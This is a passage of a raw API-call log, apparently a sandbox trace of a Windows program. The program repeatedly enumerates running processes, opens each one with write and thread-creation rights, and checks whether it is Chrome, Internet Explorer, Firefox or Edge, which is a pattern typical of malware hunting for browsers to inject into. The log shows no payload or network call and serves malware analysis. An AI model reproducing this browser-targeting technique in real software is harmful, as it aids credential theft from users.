	[0224.123] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.124] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5964
	[0224.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.124] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.125] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.125] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.125] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.127] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0224.128] CloseHandle (hObject=0x4fd0) returned 1
	[0224.128] Sleep (dwMilliseconds=0x64) 
	[0224.237] GetCurrentProcessId () returned 0x110
	[0224.237] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0224.242] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0224.244] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0224.245] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0224.247] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5968
	[0224.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.247] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.248] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.248] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.249] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.249] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.250] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x596c
	[0224.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.250] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.250] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.251] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.251] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.252] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0224.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5970
	[0224.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.252] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0224.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.253] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.253] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0224.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.253] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.254] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5974
	[0224.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.254] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.255] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.255] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.255] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0224.256] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5978
	[0224.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.256] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0224.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.257] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.257] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0224.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.257] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.258] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0224.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x597c
	[0224.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.258] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0224.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.259] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.259] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0224.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.259] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0224.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5980
	[0224.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.261] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0224.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.261] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.261] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0224.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.261] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.262] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0224.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5984
	[0224.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.262] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.263] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.263] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.263] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.263] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5988
	[0224.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.265] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.265] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.265] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.266] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.266] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x598c
	[0224.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.267] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.268] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.268] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.268] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.268] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5990
	[0224.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.269] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.270] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.270] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.270] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.271] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5994
	[0224.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.271] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.272] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.272] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.272] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5998
	[0224.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.273] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.274] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.274] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.274] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x599c
	[0224.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.275] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.276] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.276] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.276] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x59a0
	[0224.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.277] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.278] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.278] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.278] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.278] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0224.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x59a4
	[0224.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.279] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0224.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.280] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.280] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0224.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.280] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.280] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x59a8
	[0224.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.281] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.282] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.283] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.283] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0224.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x59ac
	[0224.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.284] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.284] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.285] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.285] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.285] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.286] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x59b0
	[0224.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.286] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0224.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.286] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.287] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.287] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.287] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x59b4
	[0224.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.288] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.288] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.289] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.289] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x59b8
	[0224.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.290] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.290] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.291] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.291] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.292] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0224.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x59bc
	[0224.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.293] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0224.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.293] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.293] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0224.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.294] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0224.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x59c0
	[0224.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.295] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.295] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
